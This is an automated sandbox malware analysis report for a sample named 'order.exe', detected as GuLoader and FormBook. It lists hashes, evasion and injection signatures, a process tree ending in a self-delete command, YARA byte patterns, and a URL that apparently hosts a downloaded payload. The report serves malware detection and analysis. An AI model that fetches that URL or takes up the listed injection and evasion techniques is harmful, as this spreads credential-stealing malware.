Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report order.exe

Overview

General Information

Sample Name:order.exe
Analysis ID:320634
MD5:27d7951ec430f93458370a00272d823d
SHA1:195eef585ef2307027df1ff05678ea2be23ae25e
SHA256:306d4c4068a82c3c744c534054536b99a0887d71f194a0dcb689bfea9fd0e0f3
Tags:exeGuLoader

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Potential malicious icon found
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • order.exe (PID: 6752 cmdline: 'C:\Users\user\Desktop\order.exe' MD5: 27D7951EC430F93458370A00272D823D)
    • order.exe (PID: 6008 cmdline: 'C:\Users\user\Desktop\order.exe' MD5: 27D7951EC430F93458370A00272D823D)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • chkdsk.exe (PID: 4888 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 5336 cmdline: /c del 'C:\Users\user\Desktop\order.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000013.00000002.506645902.0000000004EC0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000013.00000002.506645902.0000000004EC0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b307:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c30a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000013.00000002.506645902.0000000004EC0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183e9:$sqlite3step: 68 34 1C 7B E1
    • 0x184fc:$sqlite3step: 68 34 1C 7B E1
    • 0x18418:$sqlite3text: 68 38 2A 90 C5
    • 0x1853d:$sqlite3text: 68 38 2A 90 C5
    • 0x1842b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18553:$sqlite3blob: 68 53 D8 7F 8C
    00000013.00000002.506407898.0000000004C35000.00000004.00000020.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
    • 0x3034:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
    00000013.00000002.505278996.00000000007A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 18 entries

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: order.exeVirustotal: Detection: 22%Perma Link
      Source: order.exeReversingLabs: Detection: 41%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000013.00000002.506645902.0000000004EC0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.505278996.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.506547005.0000000004E90000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.421125890.000000001E150000.00000040.00000001.sdmp, type: MEMORY
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: unknownDNS traffic detected: queries for: pilatescollective.com
      Source: explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 00000010.00000002.520398234.0000000006870000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
      Source: explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
      Source: explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
      Source: explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: order.exe, 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmpString found in binary or memory: https://pilatescollective.com/meantunde/komyydor_NMWgNRCNBM31.bin
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: order.exe, 00000000.00000002.347850855.00000000006BA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000013.00000002.506645902.0000000004EC0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.505278996.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.506547005.0000000004E90000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.421125890.000000001E150000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000013.00000002.506645902.0000000004EC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000013.00000002.506645902.0000000004EC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000013.00000002.506407898.0000000004C35000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000013.00000002.505278996.00000000007A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000013.00000002.505278996.00000000007A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000013.00000002.508528778.00000000055FF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000013.00000002.506547005.0000000004E90000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000013.00000002.506547005.0000000004E90000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000C.00000002.421125890.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000C.00000002.421125890.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Potential malicious icon foundShow sources
      Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
      Initial sample is a PE file and has a suspicious nameShow sources
      Source: initial sampleStatic PE information: Filename: order.exe
      Source: C:\Users\user\Desktop\order.exeProcess Stats: CPU usage > 98%
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02288E45 NtProtectVirtualMemory,0_2_02288E45
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02280ABA NtWriteVirtualMemory,TerminateProcess,0_2_02280ABA
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02286E81 NtWriteVirtualMemory,0_2_02286E81
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02287738 NtSetInformationThread,0_2_02287738
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02280769 EnumWindows,NtSetInformationThread,0_2_02280769
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02280C12 NtWriteVirtualMemory,TerminateProcess,0_2_02280C12
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_022885C3 NtSetInformationThread,0_2_022885C3
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02283A2A NtWriteVirtualMemory,0_2_02283A2A
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02283E16 NtWriteVirtualMemory,0_2_02283E16
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02283A77 NtWriteVirtualMemory,0_2_02283A77
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02285243 NtWriteVirtualMemory,0_2_02285243
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02283A8D NtWriteVirtualMemory,0_2_02283A8D
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02283EF2 NtWriteVirtualMemory,0_2_02283EF2
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02283ADB NtWriteVirtualMemory,0_2_02283ADB
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02283F22 NtWriteVirtualMemory,0_2_02283F22
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02289332 NtProtectVirtualMemory,0_2_02289332
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02283B1A NtWriteVirtualMemory,0_2_02283B1A
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02283F62 NtWriteVirtualMemory,0_2_02283F62
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02283B7E NtWriteVirtualMemory,0_2_02283B7E
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_022837A9 NtWriteVirtualMemory,0_2_022837A9
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02285796 NtWriteVirtualMemory,0_2_02285796
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_022837E7 NtWriteVirtualMemory,0_2_022837E7
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02287BC8 NtSetInformationThread,0_2_02287BC8
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02283BD9 NtWriteVirtualMemory,0_2_02283BD9
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02280873 NtSetInformationThread,0_2_02280873
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_0228384E NtWriteVirtualMemory,0_2_0228384E
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02283C4E NtWriteVirtualMemory,0_2_02283C4E
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02280856 NtSetInformationThread,0_2_02280856
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_022838AA NtWriteVirtualMemory,0_2_022838AA
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_022838FA NtWriteVirtualMemory,0_2_022838FA
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02283CCA NtWriteVirtualMemory,0_2_02283CCA
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_022808C3 NtSetInformationThread,0_2_022808C3
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_0228091B NtSetInformationThread,0_2_0228091B
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02283D17 NtWriteVirtualMemory,0_2_02283D17
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02280960 NtSetInformationThread,0_2_02280960
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_0228097A NtSetInformationThread,0_2_0228097A
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02283D5F NtWriteVirtualMemory,0_2_02283D5F
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_022839A4 NtWriteVirtualMemory,0_2_022839A4
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_022839F6 NtWriteVirtualMemory,0_2_022839F6
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E9660 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_1E3E9660
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E96E0 NtFreeVirtualMemory,LdrInitializeThunk,12_2_1E3E96E0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E9710 NtQueryInformationToken,LdrInitializeThunk,12_2_1E3E9710
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E97A0 NtUnmapViewOfSection,LdrInitializeThunk,12_2_1E3E97A0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E9780 NtMapViewOfSection,LdrInitializeThunk,12_2_1E3E9780
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E9540 NtReadFile,LdrInitializeThunk,12_2_1E3E9540
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E95D0 NtClose,LdrInitializeThunk,12_2_1E3E95D0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E9A20 NtResumeThread,LdrInitializeThunk,12_2_1E3E9A20
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E9A00 NtProtectVirtualMemory,LdrInitializeThunk,12_2_1E3E9A00
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E9A50 NtCreateFile,LdrInitializeThunk,12_2_1E3E9A50
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E9860 NtQuerySystemInformation,LdrInitializeThunk,12_2_1E3E9860
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E9840 NtDelayExecution,LdrInitializeThunk,12_2_1E3E9840
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E98F0 NtReadVirtualMemory,LdrInitializeThunk,12_2_1E3E98F0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,12_2_1E3E9910
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E99A0 NtCreateSection,LdrInitializeThunk,12_2_1E3E99A0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E9610 NtEnumerateValueKey,12_2_1E3E9610
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E9670 NtQueryInformationProcess,12_2_1E3E9670
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E9650 NtQueryValueKey,12_2_1E3E9650
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E96D0 NtCreateKey,12_2_1E3E96D0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E9730 NtQueryVirtualMemory,12_2_1E3E9730
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3EA710 NtOpenProcessToken,12_2_1E3EA710
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3EA770 NtOpenThread,12_2_1E3EA770
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E9770 NtSetInformationFile,12_2_1E3E9770
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E9760 NtOpenProcess,12_2_1E3E9760
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E9FE0 NtCreateMutant,12_2_1E3E9FE0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3EAD30 NtSetContextThread,12_2_1E3EAD30
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E9520 NtWaitForSingleObject,12_2_1E3E9520
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E9560 NtWriteFile,12_2_1E3E9560
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E95F0 NtQueryInformationFile,12_2_1E3E95F0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E9A10 NtQuerySection,12_2_1E3E9A10
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E9A80 NtOpenDirectoryObject,12_2_1E3E9A80
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E9B00 NtSetValueKey,12_2_1E3E9B00
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3EA3B0 NtGetContextThread,12_2_1E3EA3B0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E9820 NtEnumerateKey,12_2_1E3E9820
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3EB040 NtSuspendThread,12_2_1E3EB040
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E98A0 NtWriteVirtualMemory,12_2_1E3E98A0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E9950 NtQueueApcThread,12_2_1E3E9950
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E99D0 NtCreateProcessEx,12_2_1E3E99D0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_0056940A NtSetInformationThread,12_2_0056940A
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_00564532 Sleep,NtProtectVirtualMemory,12_2_00564532
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_005685C3 LdrInitializeThunk,NtSetInformationThread,LdrInitializeThunk,12_2_005685C3
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_00568E45 NtProtectVirtualMemory,12_2_00568E45
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_00563249 CreateThread,TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,12_2_00563249
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_005646B4 LdrInitializeThunk,NtProtectVirtualMemory,12_2_005646B4
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_00560ABA NtProtectVirtualMemory,LdrInitializeThunk,12_2_00560ABA
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_00560769 EnumWindows,LdrInitializeThunk,NtSetInformationThread,12_2_00560769
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_0056330B RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,12_2_0056330B
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_00567738 LdrInitializeThunk,NtSetInformationThread,12_2_00567738
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_00560856 LdrInitializeThunk,NtSetInformationThread,12_2_00560856
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_00569446 NtSetInformationThread,12_2_00569446
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_00560873 LdrInitializeThunk,NtSetInformationThread,12_2_00560873
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_0056947E NtSetInformationThread,12_2_0056947E
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_00569862 NtSetInformationThread,12_2_00569862
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_00569410 NtSetInformationThread,12_2_00569410
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_0056143E NtProtectVirtualMemory,12_2_0056143E
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_0056983A NtSetInformationThread,12_2_0056983A
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_005698D4 NtSetInformationThread,12_2_005698D4
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_005608C3 LdrInitializeThunk,NtSetInformationThread,12_2_005608C3
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_005694F3 NtSetInformationThread,12_2_005694F3
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_005694B6 NtSetInformationThread,12_2_005694B6
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_005614A6 NtProtectVirtualMemory,12_2_005614A6
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_005698A3 NtSetInformationThread,12_2_005698A3
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_00569972 NtSetInformationThread,12_2_00569972
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_0056097A LdrInitializeThunk,NtSetInformationThread,12_2_0056097A
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_00560960 LdrInitializeThunk,NtSetInformationThread,12_2_00560960
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_0056956E NtSetInformationThread,12_2_0056956E
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_0056091B LdrInitializeThunk,NtSetInformationThread,12_2_0056091B
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_0056990A NtSetInformationThread,12_2_0056990A
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_00569932 NtSetInformationThread,12_2_00569932
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_005645D1 NtProtectVirtualMemory,12_2_005645D1
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_005695CE NtSetInformationThread,12_2_005695CE
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_005699F0 NtSetInformationThread,12_2_005699F0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_005699A6 NtSetInformationThread,12_2_005699A6
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_00569670 NtSetInformationThread,12_2_00569670
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_0056467E LdrInitializeThunk,NtProtectVirtualMemory,12_2_0056467E
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_0056467A LdrInitializeThunk,NtProtectVirtualMemory,12_2_0056467A
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_0056461F NtProtectVirtualMemory,12_2_0056461F
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_00569603 NtSetInformationThread,12_2_00569603
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_00569A22 NtSetInformationThread,12_2_00569A22
      Source: C:\Windows\explorer.exeCode function: 16_2_06D04A32 NtCreateFile,16_2_06D04A32
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05139540 NtReadFile,LdrInitializeThunk,19_2_05139540
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051395D0 NtClose,LdrInitializeThunk,19_2_051395D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05139710 NtQueryInformationToken,LdrInitializeThunk,19_2_05139710
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05139780 NtMapViewOfSection,LdrInitializeThunk,19_2_05139780
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05139FE0 NtCreateMutant,LdrInitializeThunk,19_2_05139FE0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05139650 NtQueryValueKey,LdrInitializeThunk,19_2_05139650
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05139660 NtAllocateVirtualMemory,LdrInitializeThunk,19_2_05139660
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051396D0 NtCreateKey,LdrInitializeThunk,19_2_051396D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051396E0 NtFreeVirtualMemory,LdrInitializeThunk,19_2_051396E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05139910 NtAdjustPrivilegesToken,LdrInitializeThunk,19_2_05139910
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051399A0 NtCreateSection,LdrInitializeThunk,19_2_051399A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05139840 NtDelayExecution,LdrInitializeThunk,19_2_05139840
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05139860 NtQuerySystemInformation,LdrInitializeThunk,19_2_05139860
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05139A50 NtCreateFile,LdrInitializeThunk,19_2_05139A50
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0513AD30 NtSetContextThread,19_2_0513AD30
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05139520 NtWaitForSingleObject,19_2_05139520
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05139560 NtWriteFile,19_2_05139560
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051395F0 NtQueryInformationFile,19_2_051395F0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0513A710 NtOpenProcessToken,19_2_0513A710
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05139730 NtQueryVirtualMemory,19_2_05139730
